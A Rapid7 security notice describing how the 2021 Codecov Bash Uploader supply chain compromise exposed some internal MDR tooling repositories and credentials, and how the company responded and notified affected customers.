Cybersecurity is Rapid7’s top priority, and when there is an incident that may pose a risk to our customers, we are transparent about it. We also believe that providing this level of transparency ultimately helps the security community better address potential pending threats and safeguard themselves from future attacks. With this in mind, we want to share an update concerning the security incident disclosed by Codecov and its potential impact on our company and customers, and how we managed the event.
On April 15, 2021, Codecov, a provider of code coverage solutions, announced a supply chain incident in which a malicious party gained access to Codecov’s Bash Uploader script and modified it, enabling the attacker to export data stored in environment variables on Codecov customers’ continuous integration (CI) systems to an attacker-controlled server. Codecov’s disclosure with more details is available at https://about.codecov.io/security-update/.
When we learned of this incident, we immediately kicked off our security incident response process. Our use of Codecov’s Bash Uploader script was limited: it was set up on a single CI server used to test and build some internal tooling for our Managed Detection and Response (MDR) service. We were not using Codecov on any CI server used for product code.
Like other Codecov customers, we have been actively investigating this incident in our environment, and after a thorough review and validation from a leading external cybersecurity forensics firm, we determined the following:
- A small subset of our source code repositories for internal tooling for our MDR service was accessed by an unauthorized party outside of Rapid7
- These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers
- No other corporate systems or production environments were accessed, and no unauthorized changes to these repositories were made
We have contacted the small subset of customers who may be impacted by this incident to ensure they take appropriate steps to mitigate any potential risk. Note: If you haven’t been contacted by us about this already, it is because you are not impacted by this incident. Through our investigation we have found no evidence of access of our Insight platform or products, nor access to any customer data sent through or stored in either.
We will update this notice if we learn new information that changes the scope of the impact described here. If you are a customer and have any questions or need further information, please contact your Account Team or email firstname.lastname@example.org.
We will also be sharing a blog post that covers some of the techniques we used when responding to this incident in hopes that it will benefit others to handle this incident and incidents similar to it.